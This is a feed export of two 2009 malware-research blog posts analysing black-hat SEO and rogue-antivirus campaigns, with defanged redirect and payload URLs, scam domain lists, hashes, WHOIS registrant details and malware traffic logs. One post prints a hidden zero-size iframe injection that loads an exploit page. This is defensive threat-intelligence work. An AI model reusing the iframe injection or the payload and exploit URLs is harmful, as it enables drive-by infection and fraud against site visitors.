tag:blogger.com,1999:blog-84347325988109737202024-03-13T11:47:37.617-07:00Malware Web ThreatsMalware web based threats: Anatomy of a web hack.
Mass compromise of legitimate websites - Blackhat SEO Rogue Antivirus software and zero-day exploits!Unknownnoreply@blogger.comBlogger31115tag:blogger.com,1999:blog-8434732598810973720.post-52616099620802687002009-04-24T09:34:00.000-07:002009-04-24T16:29:03.688-07:00Black Hat SEO and Rogue Antivirus p.9<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="498" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="498" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br /> Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more<br /><br /></p><table width="483" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="483"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> After Trend Micro researchers claimed that Easter related sites were used to<br />redirect visitors to rogue antivirus websites, PandaLabs recently uncovered <br />similar Black hat SEO attacks against Ford and Ned.org.<br /><br />By mis-using keywords typically related to global businesses and institutions, <br />the criminals attract unsuspecting visitors to compromized web sites. These sites <br />deceive visitors into downloading and installing a fake antivirus product that is<br />very hard to deactivate or remove.The rogue antivirus gives false alerts to the <br />user making them think that theircomputer is infected. Scared users are then <br />susceptible to buying the "antivirus protection" via a page that looks like a <br />secure SSL web site. In fact, their money are confidential credit card information <br />are stolen by the criminals the moment that they enter their personal information<br />into the payment page. <br /><br />Many global companies, including Ford have been exploited in this way. Over a <br />million compromized web sites used Ford-based keywords to attract visitors to <br />fake antivirussites via search engines such as Google (<a href="http://www.brafton.com/industry-news/black-hat-seo-may-force-google-change-algorithm-$1289367.htm" target="_blank">Black hat SEO may force<br />Google to change algorithm</a>).Other examples of this attack include the mis-use<br />of Easter related keywords to attract unsuspecting visitors during the Easter <br />season (<u>Trend Micro Malware Blog</u> - <a href="http://blog.trendmicro.com/rotten-eggs-an-easter-malware-campaign/">Rotten Eggs: An Easter Malware Campaign</a>).<p>There are other variants of this type of attack originating from the same <br />Ukraine / Russianbased criminal fraternity. For example, the criminals use technical <br />exploits to compromizeweb sites, blog, forums and the like. Wordpress blog <br />management software has been a victim of such an exploit allowing the criminals<br />to inject malicious code directly into all pages.A visitor to one of these infected<br />sites will beredirected to another site where rogue antivirus software is again <br />downloaded <u> (PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/New-Blackhat-SEO-attack-exploits-vulnerabilities-in-Wordpress-to-distribute-rogue-antivirus-software.aspx" target="_blank">New Blackhat SEO attack exploits vulnerabilities in <br />Wordpressto distributerogue antivirus software</a>).<p>The criminals put a lot of effort into assuring the longevity of their scam.<br />Frequent IP changes and moving from location to location help ensure that <br /> they can continue their activities.<p>You can get more information about all these attacks from the following <br />resources. The PandaLabs video gives a particularly clear and concise overview.<p> <object width="400" height="300"> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4143942&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /> <embed src="http://vimeo.com/moogaloop.swf?clip_id=4143942&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed> </object><p>The following links provide more information about this attack:<br /> <br /> <u>The Tech Herald</u>: <a href="http://www.thetechherald.com/article.php/200916/3450/Malicious-SEO-targets-Ford-Motor-Company" target="_blank">Malicious SEO targets Ford Motor Company</a><u><br /> PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/Targeted-Blackhat-SEO-Attack-against-Ford-Motor-Co_2E00_.aspx" target="_blank">Targeted Blackhat SEO Attack against Ford Motor Co.</a><br /> <br /> Read the article on WebProNews: <a href="http://www.webpronews.com/topnews/2009/04/20/google-set-to-change-ranking-algorithm" target="_blank">Blackhat SEO spammers force Google’s hand</a><br /><hr /><p> <u>Related attack:<br /> <br /> PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/Blackhat-SEO-Fueled-Rogue-Security-Campaign.aspx" target="_blank">Blackhat SEO Fueled Rogue Security Campaign</a><br /> <a href="http://support.us.pandasecurity.com/blog/list.txt" target="_blank">Sample hijacked search terms</a> (text file) <br /> <br /> The website implicated is: <span class="scam_website">getscanonline.com</span> (also hosted on 209.44.126.14).<br /> <br /> <u>Softpedia</u>: <a href="http://news.softpedia.com/news/Easter-and-Ford-Search-Results-Poisoned-109376.shtml" target="_blank">Easter and Ford Search Results Poisoned</a> <br /> <br />In this case, the files found on the site are detected by Trend Micro as <br /><a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_FAKEAV.BAF&VSect=T" target="_blank"><br />TROJ_FAKEAV.BAF</a> - <a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS_DLOADER.WKQ&VSect=T" target="_top">JS_DLOADER.WKQ</a><br /><br />The websites in question are: <span class="scam_website">trustsecurityshield.com</span> and <span class="scam_website">topsecurity4you.com</span><br />which both have served for only two or three days (hosted on 209.44.126.14).<br /> </p>
<hr />
<br />
Technicals details can be found below<br /> <br /><br /> <u>Vulnerabilities in Wordpress exploited to distribute rogue antivirus software</u><br /> <br /> Watch the full video: <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5FLsRkSW1Hl180hoAe88ZdvNncSVWYwAy8MzMyy-V3vQyIUSJ5rFB0gAZi-oemYrKNyPqJBqa1x7sLdjadNDUlg_A_h0BuVyERrqxPm-wcAs4zHA5fvPS47bG4ofWgXuNy3ZFZwHKkCc/s1600-h/malicious-website.jpg"></a><br /> <object width="400" height="300"> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /> <param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4288832&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /> <embed src="http://vimeo.com/moogaloop.swf?clip_id=4288832&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed> </object> <br /> <br /> I will take your attention on the video above. <br /> <br /> This is a screenshot at 03:11<br /> <br /> If you zoom into it you will see the domain <span class="scam_website">"load-archive-av-pro.com".</span><br /> The domain is still active and shared with many other fake scanner websites<br />like <span class="scam_website">"antivir-scan-pro-best.com"</span> for the location of the payload. <br /><a href="http://wepawet.iseclab.org/view.php?hash=0224dbcb7d367c49e1740e20445a744e&t=1240592593&type=js" target="_blank">Wepawet Analysis</a><br /> <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5FLsRkSW1Hl180hoAe88ZdvNncSVWYwAy8MzMyy-V3vQyIUSJ5rFB0gAZi-oemYrKNyPqJBqa1x7sLdjadNDUlg_A_h0BuVyERrqxPm-wcAs4zHA5fvPS47bG4ofWgXuNy3ZFZwHKkCc/s1600-h/malicious-website.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5FLsRkSW1Hl180hoAe88ZdvNncSVWYwAy8MzMyy-V3vQyIUSJ5rFB0gAZi-oemYrKNyPqJBqa1x7sLdjadNDUlg_A_h0BuVyERrqxPm-wcAs4zHA5fvPS47bG4ofWgXuNy3ZFZwHKkCc/s320/malicious-website.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328297419882455090" /></a><br /> <br /> <br /> The process:<br /> <br /> I will take some words found on Ned.org for example.<br /> <br /> <br /> The google cache: <br /> <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-roI8WU0Q8iaO41s_pDMhOEvrHM63-Vl-jrZHJIzyvFPjS8nZI3p7RIFTk6MHRUeKl0W2PUNOhTM4pFJxL6bXglZGwsQegsxpZPvrkbWLv93iBbwrqwuSrogCxNICxM8iprwACHWmwot/s1600-h/KettleVallyLineSong.jpg"></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwtBaxqHr2V1hfYrJ29dZouYbsCoiNOUmV4_5PFiqIKXb9bBycD6G1qT0o6oLEc8QAeoLbZm82BxknnzIu3zaimlPbV0oCerTYPIW4il3bcPy_zUJlrdHapZ5zrfl_JwoL0lF9pyF4zFGk/s1600-h/Ned.org-Malware_Campaign.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 138px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwtBaxqHr2V1hfYrJ29dZouYbsCoiNOUmV4_5PFiqIKXb9bBycD6G1qT0o6oLEc8QAeoLbZm82BxknnzIu3zaimlPbV0oCerTYPIW4il3bcPy_zUJlrdHapZ5zrfl_JwoL0lF9pyF4zFGk/s320/Ned.org-Malware_Campaign.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328291836656013730" /></a> <br /> <br /> The poisoned keywords: <br /> <br /> "Kettle Vally Line Song"<br /> <br /> <br /> The google search:<br /> <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-roI8WU0Q8iaO41s_pDMhOEvrHM63-Vl-jrZHJIzyvFPjS8nZI3p7RIFTk6MHRUeKl0W2PUNOhTM4pFJxL6bXglZGwsQegsxpZPvrkbWLv93iBbwrqwuSrogCxNICxM8iprwACHWmwot/s1600-h/KettleVallyLineSong.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-roI8WU0Q8iaO41s_pDMhOEvrHM63-Vl-jrZHJIzyvFPjS8nZI3p7RIFTk6MHRUeKl0W2PUNOhTM4pFJxL6bXglZGwsQegsxpZPvrkbWLv93iBbwrqwuSrogCxNICxM8iprwACHWmwot/s320/KettleVallyLineSong.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328291834495333730" /></a> <br /> <br /> The redirection analysis:<br /> <br /> <span class="scam_website">hxxp://cropperddi.fortunecity.com/6766.html</span> <br /> <span class="scam_website">hxxp://sandbergjbo.fortunecity.com/26894.html</span> <br /> <br /> <a href="http://wepawet.iseclab.org/view.php?hash=fa5c5fea775ed795a7f6bdd131ec5c86&t=1240589203&type=js" target="_blank">Analysis</a> -> redirect to a traffic management system<br /> <a href="http://wepawet.iseclab.org/view.php?hash=e47a21c33d6df03738d0dbcfdba418f8&t=1240589619&type=js" target="_blank">Analysis</a> -> redirect to a traffic management system <br /> <br /> <span class="scam_website">hxxp://redirxl.com/filt/in.cgi?5&group=5q</span> <br /> <br /> which then redirect to the malicious site<br /> <br /> <span class="scam_website">hxxp://antivir-scan-pro-best.com/11038/3/</span> <br /> <br /> The payload in located on the same site that appear on the <br />
PandaLabs article
which is:<br />
<br /> <span class="scam_website">hxxp://files.load-archive-av-pro.com/normal/<br />
setup_11038_3_1.exe</span> <br />
<br /> File size: 104971 bytes <br /> MD5...: 2a9889219ec9d0124892e5e64eaed2bd<br /> <br /> <a href="http://www.virustotal.com/analisis/4e66a86232471aefaa52aa7b4d886ddf" target="_blank">VirusTotal </a><br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1151c650ee74a1834913f5939e6f02f4d" target="_blank">Anubis</a><br /> <br /> ---------------------------<br /> <br /> 64.69.32.220<br /> <br /> <span class="scam_website">antivir-scan-pro-best.com</span> <br /> <br /> <p>Registrant: Lee Brinkman (leebrinkm@gmail.com)<br /> 4396 Ross Street<br /> Mount Vernon<br /> Illinois,62864<br /> US<br /> Tel. +001.65746675653</p> <p>Creation Date: 17-Apr-2009 <br /> Expiration Date: 17-Apr-2010</p> <p>Domain servers in listed order:<br /> <span class="scam_website">ns2.antivir-scan-pro-best.com<br /> ns1.antivir-scan-pro-best.com</span><br /><br /> Registrar: <br /> DIRECTI INTERNET SOLUTIONS PVT. LTD. <br />
D/B/A PUBLICDOMAINREGISTRY.COM<br /><br /> Also on this IP - previously used<br /><br /><span class="scam_website">checker-pc-pro-av.com</span><br /><span class="scam_website">sheck-pro-as.com</span><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqeprM4j7MQQEzaB-zuy3SSxsVw87FRJgYk8ehyphenhyphencLBNOg9KFyzYbytRsw1cG9sSqQTkExeE5Jbd4nX4wDnIg6sUS4x71w5ICyEkLN2cGldoQo_oCHbkYdLklXtOHqE_Gm7jpPv-AvE31p9/s1600-h/64.69.32.220.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 79px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqeprM4j7MQQEzaB-zuy3SSxsVw87FRJgYk8ehyphenhyphencLBNOg9KFyzYbytRsw1cG9sSqQTkExeE5Jbd4nX4wDnIg6sUS4x71w5ICyEkLN2cGldoQo_oCHbkYdLklXtOHqE_Gm7jpPv-AvE31p9/s320/64.69.32.220.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328309552673363570" /></a> <br /> </p>---------------------------<br /><br />195.88.80.127 - ECOWEB AS35695 - ecoweb.lv <br /><br /><span class="scam_website">load-archive-av-pro.com</span> <br /><span class="scam_website">files.load-archive-av-pro.com</span> <br /><br /><p>Registrant:Mary Smalls (mary.sma0@gmail.com)<br />2251 Doctors Drive<br />Los Angeles<br />California,90066<br />US<br />Tel. +001.86758776498</p><p>Creation Date: 17-Apr-2009 <br />Expiration Date: 17-Apr-2010</p><p>Domain servers in listed order:<br /><span class="scam_website"> ns2.load-archive-av-pro.com<br /> ns1.load-archive-av-pro.com</span></p>Registrar: <br /> DIRECTI INTERNET SOLUTIONS PVT.
LTD. <br />
D/B/A PUBLICDOMAINREGISTRY.COM<br /><br />Also on this IP - previously used<br /><br /><span class="scam_website">download-pro-as.net<br />load-antivir-pro-pc.com<br />files.load-antivir-pro-pc.com <br />download-pro-as.net<br /></span> <br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8KsrABAO_HDk84nrwKDwGvsgUJyPw0JOvq_jUQg85sughABW3ukhOpVdN2IpJ50n8nT2dGVCrJughLbs9xWJyq893VRhPiq6sqIJuzupZS-x-qGwSPcX51hRlSuAtm5bmjpKutZlh687V/s1600-h/195.88.80.127.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 77px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8KsrABAO_HDk84nrwKDwGvsgUJyPw0JOvq_jUQg85sughABW3ukhOpVdN2IpJ50n8nT2dGVCrJughLbs9xWJyq893VRhPiq6sqIJuzupZS-x-qGwSPcX51hRlSuAtm5bmjpKutZlh687V/s320/195.88.80.127.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328310440830247970" /></a> <br /><br />
<hr />
<br /><p>From the article on PandaLabs' blog about the SEO attack against <br />
Ford Motor Co.
you can see the domain "globextubes.com" <br />
previously hosted on 64.69.32.203. <br />
<br />This is a graph (from Robtex) of some of these sites serving in <br />
the same campaign:<br /><br /><span class="scam_website">fasttube2009.com<br /> globalstube2009.com <br /> globextubes.com <br /> streamingtubes2009.com<br /> </span> <br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYLLgcRKeoU9S7y3I9b9A-0NZ_H6JgBJO2ti8P4zeRdguVMbkpVA6DiPIJA5cEL5FVGn0HG_UM1uf0hO6ppOHjLXT9s2ggRg0HoW_FuncXSAYXw5JSBoTgL9ZK7t2TplqX_5iOaTxl2Wb/s1600-h/globextubes-com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYLLgcRKeoU9S7y3I9b9A-0NZ_H6JgBJO2ti8P4zeRdguVMbkpVA6DiPIJA5cEL5FVGn0HG_UM1uf0hO6ppOHjLXT9s2ggRg0HoW_FuncXSAYXw5JSBoTgL9ZK7t2TplqX_5iOaTxl2Wb/s320/globextubes-com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328277591200267474" /></a> <br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYLLgcRKeoU9S7y3I9b9A-0NZ_H6JgBJO2ti8P4zeRdguVMbkpVA6DiPIJA5cEL5FVGn0HG_UM1uf0hO6ppOHjLXT9s2ggRg0HoW_FuncXSAYXw5JSBoTgL9ZK7t2TplqX_5iOaTxl2Wb/s1600-h/globextubes-com.jpg"><br /> </a>This is a file found on one of these site: softwarefortubeview.40011.exe<br /><br /><a href="http://www.virustotal.com/analisis/b9ea2d9d4de565169edefc76ba5a4f41" target="_blank">VirusTotal Report</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=108520c93bee5c77409bc8b7bdc146008" target="_blank">Anubis Report</a><br /><br /><br /><br />Complete analysis below:<br /><br />After running it connect to this URL to received additional payloads to inject.<br /><br /><span class="scam_website">nhgfngfdhngf.com</span> - 216.240.148.9 <br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=103021a16beecf19b5b45f4d238d8173" target="_blank">ThreatExpert Report</a><br /><br /><span class="scam_website">hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8<br />cd98f00b204e9800998ecf8427e&os=512<br /><br />hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d<br />8cd98f00b204e9800998ecf8427e&os=512 <br /></span> <span class="scam_website"><br />(216.240.148.9)</span><br /><br />The page show these URL (Added file info and virustotal report) <br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://images2009best.com/perce/<br />30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230<br />740e19c810803919c83e9c9f487472375ee/70e/perce.jpg <br /></span> <br /><a href="http://www.virustotal.com/analisis/40a7052911f921606d09c46ceb188576" target="_blank">VirusTotal</a> - 4/40 (10%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=15e23cab221b44bd43dc9a97270ea4f7d&format=html" target="_blank">Anubis Report</a><br />File size: 94212 bytes <br />MD5...: e49048a38d0757b92a34dff6fc3b3f74 <br /><br />HTTP Activity: <br /><br /><textarea name="textarea" cols="45" rows="6">
216.240.157.91 [imagesrepository.com]
Request: POST /resolution.php
88.214.205.8 [zone-searching.com]
Request: POST /borders.php </textarea><br /><p>---------------------------------------------------- <br /><br /><span class="scam_website">hxxp://venerapictures.com/item/6000dc4d413ac4f08d<br /> c431fdc85ccde9d80ff0a04b824084feb9c840903939083e0<br /> c4f78441277ced/b0b/item.gif <br /> </span> <br /><a href="http://www.virustotal.com/analisis/c643225fd027afeabff3baec75f21e8e" target="_blank">VirusTotal</a> - 7/40 (17.5%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1e3ed412e325a0ff4c963af2a626838df" target="_blank">Anubis Report</a><br />File size: 145412 bytes<br />MD5...: d2b451fee4f7c42b06121cf03f8ea281<br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://venerapictures.com/werber/900/216.jpg</span><br /><br /><a href="http://www.virustotal.com/analisis/2f9385b2d31e24fbd2b8337303a02f8f" target="_blank">VirusTotal</a> - 8/40 (20%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=17ce261f3dabfa6a4a9e179c280a453e7" target="_blank">Anubis Report</a><br />File size: 99332 bytes <br />MD5...: 5bc8a73f3412c574909e5f3c193fed89 <br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://files.get-fails-load-av.com/exe/setup_200002.exe</span><br /><br /><a href="http://www.virustotal.com/analisis/1d973e01b69d2df97f03c7ca1e27e686" target="_blank">VirusTotal</a> - <span id="porcentaje">9/40 (22.5%)</span><br /><a href="http://anubis.iseclab.org/?action=result&task_id=104332b7aecf7fc942900f07c2e72a297" target="_blank">Anubis Report</a><br />File size: 78347 bytes<br />MD5...: ff220534519a1a116dbc2dd712bff24a <br /><br />HTTP Activity: <br /><br /><textarea name="textarea" cols="45" rows="4">
195.88.81.116 [dl.scan-anti-spy-4free.com]
195.88.80.207 [int.reporting32.com]
</textarea><br />
---------------------------------------------------- <br /><br /><span class="scam_website">hxxp://lwl-softwares.com/939.exe </span><br /><br /><a href="http://www.virustotal.com/analisis/134aceb45f081d0de75823c042925bd6" target="_blank">VirusTotal</a> - 0/39 (0%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1ef8a5604aabc7dc49d6fa8cba2f96ae8" target="_blank">Anubis Report</a><br />File size: 180224 bytes <br />MD5...: 1ff562c02c68f0a8001135dc89b4eaa1 <br /><br />HTTP Activity: <br /><br /><textarea name="textarea2" cols="45" rows="16">
78.47.186.162 [hitmidpoint.com]
Request: GET /?accs=939&
tid=100
84.243.252.87 [staritquick.com]
Request: GET /in.cgi?9&
gai=cspsa3p&gli=273&
gff=cs_221227254&al=
89.248.168.46 [toppromooffer.com]
Request: GET /srm/adv/142/?a=
cspsa3p&l=273&f=
cs_221227254&ex=&
ed=&sub=csp&prodabbr=USRM </textarea><br /><br />----------------------------------------------------<br /><br /><span class="scam_website">hxxp://lwl-softwares.com/important.exe</span><br /><br /><a href="http://anubis.iseclab.org/?action=result&task_id=176525f12bcb68e0495d6997859873e21" target="_blank">Anubis Report</a><br />File size: 135168 byte<br />MD5...: 83b4560333601224cb0d5709bdf57191 <br /><br />Trojan.Win32.Tibs<br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-67458827427674388492009-04-20T16:18:00.000-07:002009-04-20T16:20:02.767-07:00Black Hat SEO and Rogue Antivirus p.8<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br /> Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan<br /><br /></p><table width="510" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="510"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> A quick move to this IP block 209.44.126.0/24 by "Netelligent Hosting Services Inc" which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon.<br /><br />All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network (screenshot below)<br /><br /><hr />Check it out - <em>maybe someone have access to your PC right now</em>! Protect yourself.<br /><br />Also Google show <a href="http://www.google.com/search?q=%22maybe+someone+have+access+to+your+PC+right+now!%22" target="_blank">14,800 result</a> for this phrase.<br /><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 69px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAp8fd0MmPMSAzVw6jB6XE3GoiLYkSUfAuf_xxYTMiZkWEDn-cX8Qh4dmLiho0MNiPNF6O42BUoNmmSC4DMs3YYIarxnPNQ_De64g9o4uA2fmxkyTkXQE_PDCkFET3he1prfPRtwDjvkC0/s320/basevirusscan.com-fake-ad.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326619458784152914" /> <br /><br />Detection:<br /><br />Trojan TDSS<br />Trojan DNSChanger<br />Trojan Kryptik<br />Trojan FakeSpyGuard<br />Trojan InternetAntivirusPro<br /><br />Sites serving for the fake antivirus campaign:<br /><br /><b>209.44.126.14</b><p>activesecurityshield.com <br />anytoplikedsite.com <br />basevirusscan.com <br />bestfiresfull.com <br />bestsecurityupdate.com <br />checkonlinesecurity.com<br />cleanyourpcspace.com <br />destroyvirusnow.com <br />fastsecurityscan.com <br />fastviruscleaner.com <br />firstscansecurity.com <br />fuc*moneycash.com <br />fullandtotalsecurity.com <br />fullsecurityshield.com <br />getpcguard.com <br />getscanonline.com <br />getsecuritywall.com <br />greatsecurityshield.com <br />inetsecuritycenter.com <br />initialsecurityscan.com <br />mostpopularscan.com <br />myfirstsecurityscan.com <br />mytoplikedsite.com<br />mytopvirusscan.com <br />onlinescandetect.com <br />onlinescanservice.com <br />popularpcscan.com <br />runpcscannow.com <br />scanalertspage.com <br />scanbaseonline.com <br />scanprotectiononline.com<br />scanvistanow.net <br />securityscan4you.com <br />securitytopagent.com<br />thegreatsecurity.com <br />todaybestscan.com<br />topsecurity4you.com <br />topsecurityapp.com <br />topsoftscanner.com <br />totalpcdefender.com<br />totalvirusdestroyer.com <br />truescansecurity.com <br />trustsecurityshield.com <br />upyoursecurity.com <br />virustopshield.com<br />vistastabilitynow.com <br />vistastabilitynow.net <br />websecuritymaster.com <br />websecurityvoice.com <br />yourstabilitysystem.com <br /><br /><b>209.44.126.16</b><br />systemsecurityonline.com<br />systemsecuritytool.com<br /></p><p><b>209.44.126.29</b><br />individualpeople.biz (will be analyzed below)<br /><br /><b>209.44.126.14<br />209.44.126.15<br />209.44.126.16<br />209.44.126.17<br />209.44.126.22<br />209.44.126.23</b><br /><br />NS for rogue fake av websites <br /><br /><b>209.44.126.32</b><br />asmmnation.com<br /><a href="http://www.threatexpert.com/report.aspx?md5=3857827a43ea245009dd7d4bcd89f931" target="_blank">ThreatExpert report</a><br />In conjunction with an IP in ukraine : <a href="www.symantec.com/security_response/writeup.jsp?docid=2009-041208-1533-99&tabid=2" target="_blank">Symantec write up</a><br /></p><hr /><p><br />On this IP <b>209.44.126.29</b> we also have a couple of page with exploits which leads to the trojan TDSS (Alureon).<br /><br />I will take this domain for example "individualpeople[.]biz"<br /></p> Malicious script (IFRAME) inserted. <a href="http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&t=1240077587&type=js" target="_blank">Redirection Analysis</a><br /><br /><table width="383" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="379" height="61" style="padding:15px"><iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></td></tr></table> <p><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank"></a>Redirects to the page below which host several exploits. <a href="http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1240196375&type=js" target="_blank">Javascript Analysis</a> (Wepawet)<br /></p><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="368" height="61" style="padding:15px">hxxp://individualpeople.biz/go.php?sid=6</td></tr></table> <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank">Anubis Report</a><br /><br /><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="368" height="61" style="padding:15px">hxxp://209.44.126.30/unsecurity/pdf.php</td> </tr></table><br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=929b20cc7a4033457630858487bbfc7e&t=1240078681">Wepawet Analysis</a> - <a href="http://www.virustotal.com/analisis/763688a5e2cd02d43d6de933354f63be" target="_blank">VirusTotal</a><br /><br />to finally load this page <br /><br /><table width="339" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="335" height="46" style="padding:15px">hxxp://209.44.126.30/unsecurity/load.php</td></tr></table><br /><a href="http://www.virustotal.com/analisis/4ea0b7a64405a26f6c50f91fb6792c17" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1aab3383fb44f06d419479c2396b7b47f" target="_blank">Anubis</a><br /><br />Detections:<br /><br />W32/Alureon.B!Generic<br />Win32.Rootkit.TDSS.eyj.4<br />Packed.Win32.Tdss.f<br />Trojan.Win32.FakeSpyguard<br />Trojan:Win32/Alureon.gen!J<br />Trojan/Fakealert.gen <br /><br />--------------------------------------<br /><br />HTTP activity after infection<br /><br />92.48.91.145:80 - [trafficstatic.net] <br /><br />Request: GET /banner/crcmds/main <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/init <br />Response: 200 "OK" <br />Request: GET /banner/uacsrcr.dat <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/update <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacd <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacc <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uaclog <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacmask <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacserf <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET 